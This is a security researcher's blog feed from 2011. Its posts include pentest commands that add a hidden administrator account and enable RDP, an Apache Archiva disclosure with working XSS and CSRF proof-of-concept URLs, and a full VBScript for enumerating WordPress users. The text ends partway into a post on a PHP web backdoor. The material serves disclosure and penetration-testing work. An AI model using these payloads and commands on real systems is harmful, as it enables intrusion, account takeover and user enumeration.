<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-4333330172780240225</id><updated>2012-01-25T03:56:03.630-08:00</updated><category term='web application'/><category term='Antwerp'/><category term='xvid'/><category term='First post'/><category term='desktops'/><category term='Cool'/><category term='Removable'/><category term='vulnerability'/><category term='office life'/><category term='malware'/><category term='tcpview'/><category term='CTF'/><category term='Backup APIs'/><category term='Awesome'/><category term='Spambot'/><category term='torrents'/><category term='Windows'/><category term='bid'/><category term='misery'/><category term='process monitor'/><category term='RootKitRevealer'/><category term='cocon'/><category term='angel'/><category term='openfire'/><category term='rdp'/><category term='pg room'/><category term='amvo.exe'/><category term='FolderCloak'/><category term='full disclosure'/><category term='xss'/><category term='Humor'/><category term='evil'/><category term='Pain'/><category term='process explorer'/><category term='kids'/><category term='story'/><category term='username enumeration'/><category term='SeLoadDriverPrivelege'/><category term='os'/><category term='walkthrough'/><category term='hsr'/><category term='IPL'/><category term='inflation'/><category term='hacker conference'/><category term='dream'/><category term='autorun'/><category term='themes'/><category term='xmlhttp'/><category term='wordpress'/><category term='USB'/><category term='autogk'/><category term='SmartPhone'/><category term='movie'/><category term='rain'/><category term='ranvir'/><category term='apache archiva'/><category term='System 
Folders'/><category term='rainmeter'/><category term='Recycle Bin'/><category term='Secret'/><category term='love'/><category term='Do Re Mi'/><category term='csrf'/><category term='Windows Mobile'/><category term='irony'/><category term='admin'/><category term='2011'/><category term='joomla'/><category term='deviantart'/><category term='Cricket'/><category term='hacking'/><category term='delnaz'/><category term='Sysinternals'/><category term='c0c0n'/><category term='prices'/><category term='data hiding'/><category term='dvdrip'/><category term='compression'/><category term='Auction'/><category term='enigma'/><category term='memories'/><category term='zeus'/><category term='dvd decrypter'/><category term='shell'/><category term='owasp'/><category term='axxo'/><category term='Acer M900'/><category term='fppg1'/><category term='Dream Phone'/><category term='vbscript'/><category term='command execution'/><category term='bots'/><category term='sarcasm'/><category term='NTStream'/><category term='Happy'/><category term='20Twenty'/><category term='birthday'/><category term='backdoor'/><category term='Belgium'/><category term='php'/><category term='ajax'/><category term='poc'/><category term='tutorial'/><category term='raees'/><category term='remote'/><category term='Kneber'/><category term='NTFS ADS'/><category term='life'/><category term='HITB'/><category term='Maria'/><category term='LFI'/><category term='10 foot HUD'/><category term='cve'/><category term='virus'/><category term='Station'/><category term='Case Study'/><category term='fiction'/><category term='security conference'/><category term='700mb'/><category term='Mark Russinovich'/><title type='text'>A Programmer's Rhapsody</title><subtitle type='html'>Life, computers and everything else...</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://www.riyazwalikar.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' 
href='http://www.blogger.com/feeds/4333330172780240225/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://www.riyazwalikar.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Riyaz Ahemed Walikar</name><uri>http://www.blogger.com/profile/10553011445419057597</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='29' height='32' src='http://4.bp.blogspot.com/-MIZDdHYp--E/TmaNnP9_lpI/AAAAAAAAAbg/OrRXb1k0JDM/s220/profile.jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>23</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-4333330172780240225.post-4614382535795003047</id><published>2011-10-16T11:30:00.001-07:00</published><updated>2011-10-16T11:37:22.042-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='hacker conference'/><category scheme='http://www.blogger.com/atom/ns#' term='c0c0n'/><category scheme='http://www.blogger.com/atom/ns#' term='security conference'/><category scheme='http://www.blogger.com/atom/ns#' term='CTF'/><category scheme='http://www.blogger.com/atom/ns#' term='cocon'/><category scheme='http://www.blogger.com/atom/ns#' term='2011'/><category scheme='http://www.blogger.com/atom/ns#' term='walkthrough'/><title type='text'>C0C0N 2011 - CTF Walkthrough</title><content type='html'>&lt;span style="font-family:trebuchet ms;"&gt;I won the recently concluded C0C0N Capture the Flag event at the conference. 
Here's the walkthrough for all the levels on slideshare.&lt;/span&gt;&lt;br /&gt;&lt;div style="width:477px" id="__ss_9722200"&gt; &lt;strong style="display:block;margin:12px 0 4px"&gt;&lt;a href="http://www.slideshare.net/riyazwalikar/c0c0n-2011-ctf-walkthrough" title="C0c0n 2011 CTF Walkthrough" target="_blank"&gt;C0c0n 2011 CTF Walkthrough&lt;/a&gt;&lt;/strong&gt; &lt;iframe src="http://www.slideshare.net/slideshow/embed_code/9722200" marginwidth="0" marginheight="0" frameborder="0" height="510" scrolling="no" width="477"&gt;&lt;/iframe&gt; &lt;div style="padding:5px 0 12px"&gt; View more &lt;a href="http://www.slideshare.net/" target="_blank"&gt;documents&lt;/a&gt; from &lt;a href="http://www.slideshare.net/riyazwalikar" target="_blank"&gt;riyazwalikar&lt;/a&gt; &lt;/div&gt; &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4333330172780240225-4614382535795003047?l=www.riyazwalikar.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.riyazwalikar.com/feeds/4614382535795003047/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.riyazwalikar.com/2011/10/c0c0n-2011-ctf-walkthrough.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4333330172780240225/posts/default/4614382535795003047'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4333330172780240225/posts/default/4614382535795003047'/><link rel='alternate' type='text/html' href='http://www.riyazwalikar.com/2011/10/c0c0n-2011-ctf-walkthrough.html' title='C0C0N 2011 - CTF Walkthrough'/><author><name>Riyaz Ahemed Walikar</name><uri>http://www.blogger.com/profile/10553011445419057597</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='29' height='32' 
src='http://4.bp.blogspot.com/-MIZDdHYp--E/TmaNnP9_lpI/AAAAAAAAAbg/OrRXb1k0JDM/s220/profile.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4333330172780240225.post-2459026693768694354</id><published>2011-08-17T18:16:00.000-07:00</published><updated>2011-08-17T20:48:33.980-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='rdp'/><category scheme='http://www.blogger.com/atom/ns#' term='LFI'/><category scheme='http://www.blogger.com/atom/ns#' term='os'/><category scheme='http://www.blogger.com/atom/ns#' term='remote'/><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><category scheme='http://www.blogger.com/atom/ns#' term='command execution'/><title type='text'>Enable RDP via Command line</title><content type='html'>&lt;span style="font-family:trebuchet ms;"&gt;Been extremely busy with loads of work. Anyways, here's something interesting that I needed to do recently at a customer network to gain access to a server.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;I managed to obtain a web application shell to the server and was able to execute commands as Administrator. The application was running on XAMPP under an administrative account, so I was lucky there. But what I needed was GUI access to the desktop because I wanted to compromise another server which was reachable using a custom programmed application running on the server that I had just gained access to. Here's what I did:&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;&lt;br /&gt;1. Created a user and added it to the local administrators group using these commands:&lt;br /&gt;&lt;pre&gt;net user newadmin newpa$$w0rd /add&lt;br /&gt;net localgroup administrators newadmin /add&lt;br /&gt;net user newadmin&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;2. 
Used the following commands to enable Remote Desktop and logged in with my credentials:&lt;br /&gt;&lt;pre&gt;reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"&lt;br /&gt;/v fDenyTSConnections /t REG_DWORD /d 0 /f&lt;br /&gt;&lt;br /&gt;netsh firewall set portopening TCP 3389&lt;/pre&gt;&lt;br /&gt;3. Bit off a large chunk of some awesome tasting chicken sandwich, sipped some coffee and then proceeded with the rest of the Penetration Test.&lt;br /&gt;&lt;br /&gt;Lot of Penetration Testers, reach this wall at some point during their assessments. Hope this helps some tired soul like me.&lt;br /&gt;&lt;br /&gt;Happy Hacking!&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4333330172780240225-2459026693768694354?l=www.riyazwalikar.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.riyazwalikar.com/feeds/2459026693768694354/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.riyazwalikar.com/2011/08/enable-rdp-via-command-line.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4333330172780240225/posts/default/2459026693768694354'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4333330172780240225/posts/default/2459026693768694354'/><link rel='alternate' type='text/html' href='http://www.riyazwalikar.com/2011/08/enable-rdp-via-command-line.html' title='Enable RDP via Command line'/><author><name>Riyaz Ahemed Walikar</name><uri>http://www.blogger.com/profile/10553011445419057597</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='29' height='32' 
src='http://4.bp.blogspot.com/-MIZDdHYp--E/TmaNnP9_lpI/AAAAAAAAAbg/OrRXb1k0JDM/s220/profile.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4333330172780240225.post-2428163433958977288</id><published>2011-05-30T04:10:00.000-07:00</published><updated>2011-05-30T04:31:42.631-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='web application'/><category scheme='http://www.blogger.com/atom/ns#' term='full disclosure'/><category scheme='http://www.blogger.com/atom/ns#' term='csrf'/><category scheme='http://www.blogger.com/atom/ns#' term='bid'/><category scheme='http://www.blogger.com/atom/ns#' term='cve'/><category scheme='http://www.blogger.com/atom/ns#' term='xss'/><category scheme='http://www.blogger.com/atom/ns#' term='vulnerability'/><category scheme='http://www.blogger.com/atom/ns#' term='apache archiva'/><title type='text'>Apache Archiva Multiple XSS &amp; CSRF Vulnerabilities</title><content type='html'>&lt;div style="text-align: justify;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;I am honestly surprised at the frequency and places one would find threats like Cross Site Scripting and Cross Site Request Forgery. Although immensely easy to locate and exploit, it can get quite twisted to fix these issues in large applications. Here's a rundown on another product that was found vulnerable. As part of the vulnerability research that I do with published web applications, I downloaded a copy of Apache's Archiva 1.3.4 which was the latest published edition on the vendor's website. Upon examination, there seemed to be several issues with the application that I reported responsibly to the vendor and co-operated in responsible disclosure. 
Since the cat is now out of the bag, here's the condensed disclosure document with the exploit code intact.&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;&lt;span style="font-family:courier new;font-size:85%;"&gt;Title: Multiple XSS &amp;amp; CSRF Vulnerabilities in Apache Archiva 1.3.4&lt;br /&gt;--------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Project: Apache Archiva&lt;br /&gt;Severity: High&lt;br /&gt;Versions: 1.3.0 - 1.3.4. The unsupported versions Archiva 1.0 - 1.2.2 are also affected.&lt;br /&gt;Exploit type: Multiple XSS &amp;amp; CSRF&lt;br /&gt;Mitigation: Archiva 1.3.4 and earlier users should upgrade to 1.3.5&lt;br /&gt;Vendor URL: http://archiva.apache.org/security.html&lt;br /&gt;CVE: CVE-2011-1077, CVE-2011-1026&lt;br /&gt;--------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Timeline:&lt;br /&gt;28 February 2011: Vendor Contacted&lt;br /&gt;1 March 2011:  Vendor Response received. CVE-2011-1026 for CSRF Issues Assigned.&lt;br /&gt;7 March 2011:  CVE-2011-1077 Assigned for XSS Issues.&lt;br /&gt;14 March 2011: Fixes released to selected channels / Found to be insufficient&lt;br /&gt;27 May 2011: Vendor releases v1.3.5&lt;br /&gt;27 May 2011: Vendor releases security disclosure to Bugtraq and FD.&lt;br /&gt;30 May 2011: Exploit details released on Bugtraq &amp;amp; FD&lt;br /&gt;--------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Product Description:&lt;br /&gt;Apache Archiva is an extensible repository management software that helps taking care of your own personal or enterprise-wide build artifact repository. 
It is the perfect companion for build tools such as Maven, Continuum, and ANT.&lt;br /&gt;&lt;br /&gt;Archiva offers several capabilities, amongst which remote repository proxying, security access management, build artifact storage, delivery, browsing, indexing and usage reporting, extensible scanning functionality... and many more!&lt;br /&gt;(Source: http://archiva.apache.org/)&lt;br /&gt;--------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Vulnerability Details:&lt;br /&gt;XSS: User can insert HTML or execute arbitrary JavaScript code within the vulnerable application. The vulnerabilities arise due to insufficient input validation in multiple input fields throughout the application.&lt;br /&gt;Successful exploitation of these vulnerabilities could result in, but is not limited to, compromise of the application, theft of&lt;br /&gt;cookie-based authentication credentials, arbitrary URL redirection, disclosure or modification of sensitive data and phishing attacks.&lt;br /&gt;&lt;br /&gt;CSRF: These issues allow an attacker to access and use the application with the session of a logged-on user. 
In this case if an administrative account is exploited, total application compromise may be acheived.&lt;br /&gt;An attacker can build a simple html page containing a hidden Image tag (eg: &amp;lt;img src=vulnurl width=0 height=0 /&amp;gt;) and entice the administrator to access the page.&lt;br /&gt;----------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Proof of Concept:&lt;br /&gt;Reflected XSS:&lt;br /&gt;http://127.0.0.1:8080/archiva/security/useredit.action?username=test&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;&lt;br /&gt;http://127.0.0.1:8080/archiva/security/roleedit.action?name=%22&amp;gt;&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;&lt;br /&gt;http://127.0.0.1:8080/archiva/security/userlist!show.action?roleName=test&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;&lt;br /&gt;http://127.0.0.1:8080/archiva/deleteArtifact!doDelete.action?groupId=1&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;&amp;amp;artifactId=1&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;&amp;amp;version=1&amp;amp;repositoryId=internal&lt;br /&gt;http://127.0.0.1:8080/archiva/admin/addLegacyArtifactPath!commit.action?legacyArtifactPath.path=test&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;&amp;amp;groupId=test&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;&amp;amp;artifactId=test&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;&amp;amp;version=test&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;&amp;amp;classifier=test&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;&amp;amp;type=test&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;&lt;br /&gt;http://127.0.0.1:8080/archiva/admin/deleteNetworkProxy!confirm.action?proxyid=test&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Persistant (Stored) XSS:&lt;br /&gt;Exploit code: 
test&amp;lt;script&amp;gt;alert('xss')&amp;lt;/script&amp;gt;&lt;br /&gt;http://127.0.0.1:8080/archiva/admin/addRepository.action (Identifier:repository.id, Name:repository.name, Directory:repository.location, Index Directory:repository.indexDir)&lt;br /&gt;http://127.0.0.1:8080/archiva/admin/confirmDeleteRepository.action?repoid=&lt;br /&gt;&lt;br /&gt;http://127.0.0.1:8080/archiva/admin/editAppearance.action (Name:organisationName, URL:organisation:URL, LogoURL:organisation:URL)&lt;br /&gt;http://127.0.0.1:8080/archiva/admin/configureAppearance.action&lt;br /&gt;&lt;br /&gt;http://127.0.0.1:8080/archiva/admin/addLegacyArtifactPath.action(Path:name=legacyArtifactPath.path, GroupId:groupId, ArtifactId:artifactId, Version:version, Classifier:classifier, Type:type)&lt;br /&gt;http://127.0.0.1:8080/archiva/admin/legacyArtifactPath.action&lt;br /&gt;&lt;br /&gt;http://127.0.0.1:8080/archiva/admin/addNetworkProxy.action (Identifier:proxy.id, Protocol:proxy.protocol, Hostname:proxy.host, Port:proxy.port, Username:proxy.username)&lt;br /&gt;http://127.0.0.1:8080/archiva/admin/networkProxies.action&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;CSRF:&lt;br /&gt;http://127.0.0.1:8080/archiva/security/usercreate!submit.action?user.username=tester123&amp;amp;user.fullName=test&amp;amp;user.email=test%40test.com&amp;amp;user.password=abc&amp;amp;user.confirmPassword=abc&lt;br /&gt;http://127.0.0.1:8080/archiva/security/userdelete!submit.action?username=test&lt;br 
/&gt;http://127.0.0.1:8080/archiva/security/addRolesToUser.action?principal=test&amp;amp;addRolesButton=true&amp;amp;__checkbox_addNDSelectedRoles=Guest&amp;amp;__checkbox_addNDSelectedRoles=Registered+User&amp;amp;addNDSelectedRoles=System+Administrator&amp;amp;__checkbox_addNDSelectedRoles=System+Administrator&amp;amp;__checkbox_addNDSelectedRoles=User+Administrator&amp;amp;__checkbox_addNDSelectedRoles=Global+Repository+Manager&amp;amp;__checkbox_addNDSelectedRoles=Global+Repository+Observer&amp;amp;submitRolesButton=Submit&lt;br /&gt;http://127.0.0.1:8080/archiva/admin/deleteRepository.action?repoid=test&amp;amp;method%3AdeleteContents=Delete+Configuration+and+Contents&lt;br /&gt;http://127.0.0.1:8080/archiva/deleteArtifact!doDelete.action?groupId=1&amp;amp;artifactId=1&amp;amp;version=1&amp;amp;repositoryId=snapshots&lt;br /&gt;http://127.0.0.1:8080/archiva/admin/addRepositoryGroup.action?repositoryGroup.id=csrfgrp&lt;br /&gt;http://127.0.0.1:8080/archiva/admin/deleteRepositoryGroup.action?repoGroupId=test&amp;amp;method%3Adelete=Confirm&lt;br /&gt;http://127.0.0.1:8080/archiva/admin/disableProxyConnector!disable.action?target=maven2-repository.dev.java.net&amp;amp;source=internal&lt;br /&gt;http://127.0.0.1:8080/archiva/admin/deleteProxyConnector!delete.action?target=maven2-repository.dev.java.net&amp;amp;source=snapshots&lt;br /&gt;http://127.0.0.1:8080/archiva/admin/deleteLegacyArtifactPath.action?path=jaxen/jars/jaxen-1.0-FCS-full.jar&lt;br /&gt;http://127.0.0.1:8080/archiva/admin/saveNetworkProxy.action?mode=add&amp;amp;proxy.id=ntwrk&amp;amp;proxy.protocol=http&amp;amp;proxy.host=test&amp;amp;proxy.port=8080&amp;amp;proxy.username=&amp;amp;proxy.password=&lt;br /&gt;http://127.0.0.1:8080/archiva/admin/deleteNetworkProxy!delete.action?proxyid=myproxy&lt;br /&gt;http://127.0.0.1:8080/archiva/admin/repositoryScanning!addFiletypePattern.action?pattern=**/*.rum&amp;amp;fileTypeId=artifacts&lt;br 
/&gt;http://127.0.0.1:8080/archiva/admin/repositoryScanning!removeFiletypePattern.action?pattern=**/*.rum&amp;amp;fileTypeId=artifacts&lt;br /&gt;http://127.0.0.1:8080/archiva/admin/repositoryScanning!updateKnownConsumers.action?enabledKnownContentConsumers=auto-remove&amp;amp;enabledKnownContentConsumers=auto-rename&amp;amp;enabledKnownContentConsumers=create-missing-checksums&amp;amp;enabledKnownContentConsumers=index-content&amp;amp;enabledKnownContentConsumers=metadata-updater&amp;amp;enabledKnownContentConsumers=repository-purge&amp;amp;enabledKnownContentConsumers=update-db-artifact&amp;amp;enabledKnownContentConsumers=validate-checksums&lt;br /&gt;http://127.0.0.1:8080/archiva/admin/database!updateUnprocessedConsumers.action?enabledUnprocessedConsumers=update-db-project&lt;br /&gt;http://127.0.0.1:8080/archiva/admin/database!updateCleanupConsumers.action?enabledCleanupConsumers=not-present-remove-db-artifact&amp;amp;enabledCleanupConsumers=not-present-remove-db-project&amp;amp;enabledCleanupConsumers=not-present-remove-indexed&lt;br /&gt;---------------------------------------------------------------------&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;&lt;br /&gt;Please update to Archiva 1.3.5, available for download via the vendor's website.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4333330172780240225-2428163433958977288?l=www.riyazwalikar.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.riyazwalikar.com/feeds/2428163433958977288/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.riyazwalikar.com/2011/05/apache-archiva-multiple-xss-csrf.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' 
href='http://www.blogger.com/feeds/4333330172780240225/posts/default/2428163433958977288'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4333330172780240225/posts/default/2428163433958977288'/><link rel='alternate' type='text/html' href='http://www.riyazwalikar.com/2011/05/apache-archiva-multiple-xss-csrf.html' title='Apache Archiva Multiple XSS &amp; CSRF Vulnerabilities'/><author><name>Riyaz Ahemed Walikar</name><uri>http://www.blogger.com/profile/10553011445419057597</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='29' height='32' src='http://4.bp.blogspot.com/-MIZDdHYp--E/TmaNnP9_lpI/AAAAAAAAAbg/OrRXb1k0JDM/s220/profile.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4333330172780240225.post-7958721311476391422</id><published>2011-05-29T07:23:00.000-07:00</published><updated>2011-05-30T04:29:23.456-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='wordpress'/><category scheme='http://www.blogger.com/atom/ns#' term='full disclosure'/><category scheme='http://www.blogger.com/atom/ns#' term='poc'/><category scheme='http://www.blogger.com/atom/ns#' term='xmlhttp'/><category scheme='http://www.blogger.com/atom/ns#' term='ajax'/><category scheme='http://www.blogger.com/atom/ns#' term='username enumeration'/><category scheme='http://www.blogger.com/atom/ns#' term='vulnerability'/><category scheme='http://www.blogger.com/atom/ns#' term='vbscript'/><title type='text'>WordPress UserId &amp; Username Enumeration Exploit/PoC Script</title><content type='html'>&lt;div style="text-align: justify;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;On 26th May 2011, a relatively easy to detect and exploit vulnerability was found with WordPress. The issue being with WordPress disclosing usernames based on a simple URL parameter and the consequent page redirect/HTTP status. 
Although WordPress has implemented usernames in the title bar as a feature, this can be abused easily by repeatedly supplying an author=number to the main page to enumerate usernames. The full disclosure posting can be found at http://seclists.org/fulldisclosure/2011/May/493&lt;br /&gt;&lt;br /&gt;Even though there are a lot of scripts/exploits/PoC already popping up all over the Internet to abuse this, this post will show how easy it is to automate the enumeration using Ajax/XMLHTTP via VBScript.&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;&lt;span style="font-family:courier new;font-size:85%;"&gt;'Author: karniv0re@null.co.in&lt;br /&gt;'User enumeration script for WordPress v2.6, 3.1, 3.1.1, 3.1.3&lt;br /&gt;'This script allows an attacker to enumerate wordpress users by &lt;br /&gt;'querying the value of the parameter 'author' using xmlHTTP.&lt;br /&gt;&lt;br /&gt;Dim url, sQuery, args, i, max&lt;br /&gt;&lt;br /&gt;if wscript.arguments.count &amp;lt; 1 then&lt;br /&gt;wscript.echo "WPEnum - WordPress User Enumeration Script"&lt;br /&gt;wscript.echo "Author: karniv0re@null.co.in"&lt;br /&gt;wscript.echo "Insufficient Parameters."&lt;br /&gt;wscript.echo&lt;br /&gt;wscript.echo "cscript WPEnum.vbs &amp;lt;url&amp;gt; [&amp;lt;max_users&amp;gt;]"&lt;br /&gt;wscript.echo "&amp;lt;url&amp;gt;: A WordPress based website in the form of http://site/"&lt;br /&gt;wscript.echo "&amp;lt;max_users&amp;gt;:[Optional] Maximum number of users. 
Default 20."&lt;br /&gt;wscript.echo "Example: cscript WPEnum.vbs http://www.mywordpress.com/ 10"&lt;br /&gt;wscript.echo&lt;br /&gt;wscript.quit&lt;br /&gt;End if&lt;br /&gt;&lt;br /&gt;set args = wscript.Arguments&lt;br /&gt;&lt;br /&gt;wscript.echo "WPEnum - WordPress User Enumeration Script"&lt;br /&gt;wscript.echo "Author: karniv0re@null.co.in"&lt;br /&gt;wscript.echo&lt;br /&gt;wscript.echo "Enumerating ..."&lt;br /&gt;wscript.echo&lt;br /&gt;&lt;br /&gt;i=0&lt;br /&gt;max=20&lt;br /&gt;url = args(0)&lt;br /&gt;if right(url,1)&amp;lt;&amp;gt; "/" then&lt;br /&gt;url = url &amp;amp; "/"&lt;br /&gt;End if&lt;br /&gt;&lt;br /&gt;if wscript.arguments.count = 2 AND IsNumeric(args(1)) then&lt;br /&gt;max=args(1)&lt;br /&gt;End if&lt;br /&gt;&lt;br /&gt;Set xmlHTTP = Nothing&lt;br /&gt;set xmlHTTP = CreateObject("Microsoft.XmlHttp")&lt;br /&gt;&lt;br /&gt;For i=1 to max&lt;br /&gt;sQuery = args(0) &amp;amp; "?author=" &amp;amp; i&lt;br /&gt;xmlHTTP.open "GET", sQuery, false&lt;br /&gt;xmlHTTP.send ""&lt;br /&gt;&lt;br /&gt;wscript.sleep 70&lt;br /&gt;&lt;br /&gt;do while not xmlHTTP.readyState=4&lt;br /&gt;Loop&lt;br /&gt;&lt;br /&gt;if xmlHTTP.status = 404 then&lt;br /&gt;  wscript.echo&lt;br /&gt;  i=i-1&lt;br /&gt;  wscript.echo i &amp;amp; " users enumerated."&lt;br /&gt;  wscript.echo "Done!"&lt;br /&gt;  Set xmlHTTP = Nothing&lt;br /&gt;  wscript. 
quit&lt;br /&gt;End if&lt;br /&gt;&lt;br /&gt;wscript.echo "Userid:" &amp;amp; i&lt;br /&gt;&lt;br /&gt;k = Instr(Lcase(xmlHTTP.responseText),"&amp;lt;title&amp;gt;")&lt;br /&gt;j = Instr(Lcase(xmlHTTP.responseText),"&amp;lt;/title&amp;gt;")&lt;br /&gt;username = Mid(xmlHTTP.responseText, k+7, j-k-7)&lt;br /&gt;wscript.echo username&lt;br /&gt;wscript.echo&lt;br /&gt;Next&lt;br /&gt;&lt;br /&gt;wscript.echo i &amp;amp; " users enumerated."&lt;br /&gt;wscript.echo "Done!"&lt;br /&gt;&lt;br /&gt;Set xmlHTTP = Nothing&lt;br /&gt;&lt;br /&gt;'End of program&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4333330172780240225-7958721311476391422?l=www.riyazwalikar.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.riyazwalikar.com/feeds/7958721311476391422/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.riyazwalikar.com/2011/05/wordpress-userid-username-enumeration.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4333330172780240225/posts/default/7958721311476391422'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4333330172780240225/posts/default/7958721311476391422'/><link rel='alternate' type='text/html' href='http://www.riyazwalikar.com/2011/05/wordpress-userid-username-enumeration.html' title='WordPress UserId &amp; Username Enumeration Exploit/PoC Script'/><author><name>Riyaz Ahemed Walikar</name><uri>http://www.blogger.com/profile/10553011445419057597</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='29' height='32' 
src='http://4.bp.blogspot.com/-MIZDdHYp--E/TmaNnP9_lpI/AAAAAAAAAbg/OrRXb1k0JDM/s220/profile.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4333330172780240225.post-7495228330711645405</id><published>2011-03-19T16:35:00.000-07:00</published><updated>2011-03-19T17:00:33.764-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='web application'/><category scheme='http://www.blogger.com/atom/ns#' term='LFI'/><category scheme='http://www.blogger.com/atom/ns#' term='CTF'/><category scheme='http://www.blogger.com/atom/ns#' term='HITB'/><category scheme='http://www.blogger.com/atom/ns#' term='backdoor'/><category scheme='http://www.blogger.com/atom/ns#' term='php'/><category scheme='http://www.blogger.com/atom/ns#' term='shell'/><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><title type='text'>Simple PHP Web Application Backdoor</title><content type='html'>&lt;div style="text-align: justify;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;The Hack In the Box CTF PreQuals 2011 had hackers from all over the world rack their brains against a Windows Binary and a Web Application. The challenge was to submit the MD5  sum of a flag either from the binary or from the application server. Somewhere between the night of March 19th and the early morning of March 20th, a group of hackers from India managed to crack the Web Application challenge.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;The web application in question was vulnerable to a Local File Inclusion vulnerability. The web server also had its FTP port open and permitted anonymous login and file upload. It was then a matter of time when people who found this started uploading web application shells which would then be called from the application's home page. A simple Google search will give tons of shells that would allow attackers to do awesome amounts of stuff at the mere click of buttons. 
